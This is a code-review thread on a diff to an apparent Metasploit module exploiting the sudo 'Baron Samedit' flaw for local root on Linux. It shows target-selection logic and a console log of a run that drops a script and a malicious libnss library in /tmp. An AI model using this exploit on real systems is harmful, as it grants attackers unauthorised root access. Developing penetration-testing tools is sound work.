modules/exploits/linux/local/sudo_baron_samedit.rb

```diff
@@ -126,31 +144,106 @@ def get_automatic_target
     selected_target
   end
 
+  def find_exec_program
+    return 'python' if command_exists?('python')
+    return 'python3' if command_exists?('python3')
+
+    return false
+  end
+
   def exploit
+    resolved_target = (target.name == 'Automatic' ? get_automatic_target : target)
+
+    case resolved_target[:exploit_technique]
+    when 'nss'
+      exploit_nss(resolved_target)
+    when 'userspec'
+      exploit_userspec(resolved_target)
+    end
+    if !session && !datastore['DisablePayloadHandler']
+      print_error('Exploit failed. Alternative exploit scripts may exist for this target. Run: `show targets`.')
```

Comment:
Could this be updated so if the target is automatic, the other target will be tried next?

Alternatively, could this be updated to use the fingerprint of the current target (if it exists) and count the number of entries in the targets that share it to identify whether or not there is another version available?

Reply:
I've added some code to take the latter approach. Thought was with the automatically-do-both approach, in the case of DisablePayloadHandler being set, the module won't get notified about the new session, and so it'll run the second attempt no matter what.

Reply:
```
msf6 exploit(linux/local/sudo_baron_samedit) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Using 'python3' to run exploit
[*] Writing '/tmp/Mv3BlaG.py' (763 bytes) ...
[*] Creating directory /tmp/libnss_kAiX
[*] /tmp/libnss_kAiX created
[*] Writing '/tmp/libnss_kAiX/Nb .so.2' (564 bytes) ...
[*] Running python3 /tmp/Mv3BlaG.py 56 54 63 212 kAiX/Nb /tmp
[*] 
[*] Alternative exploit target(s) exist for this OS version:
[*] 2: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
[*] Run `set target <id>` to select an alternative exploit script
```